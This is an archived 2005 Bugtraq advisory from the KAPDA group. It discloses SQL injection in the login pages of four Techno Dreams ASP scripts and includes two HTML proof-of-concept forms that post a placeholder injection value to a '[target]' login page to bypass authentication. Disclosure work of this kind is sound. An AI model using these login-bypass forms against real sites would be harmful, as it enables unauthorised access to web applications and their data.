lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 26 Oct 2005 17:15:28 -0000
From: advisory@...da.ir
To: bugtraq@...urityfocus.com
Subject: [KAPDA::#9] Techno Dreams Scripts Vulnerabilities


[KAPDA::#9]Techno Dreams Scripts Vulnerabilities

KAPDA New advisory

Vulnerable products : 

Techno Dreams Announcement Script
Techno Dreams Guestbook Script
Techno Dreams Mailing List Script
Techno Dreams WebDirectory Script

Vendor: http://www.t-dreams.com/

Risk: High

Vulnerability: Sql injection

Date :
--------------------
2005/10/22

About Techno Dreams Scripts
--------------------
Techno Dreams Announcement Script 

     If you have a site and want to make a section for Announcements or 

   Recent News, then you might need this script.

Techno Dreams Guestbook Script 

     It uses MS Access with ability to be upgraded into SQL. Now, we've 

   added an Admin Area for the script.

Techno Dreams Mailing List Script : 

     Let your visitors join your mailing list... and send mass emails to all 

   of this list. Very good but simple ASP script (MS Access but SQL 

   upgradeable).


Techno Dreams WebDirectory :

     Simple yet effect search engine (if we could say about it; since it's 

   look like a web directory). With some advance features like approval, 

   hits, categories, advance search, admin area, what's new, new updated, 

   and what's hot...

	Vendor`s description : http://www.t-dreams.com/downloads.asp

Discussion :
----------------
  Several scripts do not properly validate user-supplied input. A remote 

user can create specially crafted parameter values that will execute 

SQL commands on the underlying database.

Vulnerabilities:
--------------------
Sql injection in /admin/login.asp (Announcement - Guestbook - 

WebDirectory)

Sql injection in /login.asp ( Mailing List)

at parameter named 'userid'. Attacker can enter SQL command to

 login as low-level user.(For all products)

Proof of Concepts:
--------------------

<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script 
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers 
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/admin/login.asp">
<input type="hidden" name="userid" value="[SQL Injection]">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s 
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers 
Institute
of Iran</a></p>
<form method="POST" action="http://[target]/login.asp">
<input type="hidden" name="userid" value="[SQL Injection}">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>

Solution:
--------------------
No patch`s released yet by vendor.

More Detail:
--------------------
http://www.kapda.ir/advisory-103.html
Visit Above Link for more details.


Credit :
--------------------
Farhad Koosha of KAPDA
farhadkey [at} kapda.ir
Kapda - Security Science Researchers Insitute of Iran
http://www.KAPDA.ir
(PersianHacker.NET)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ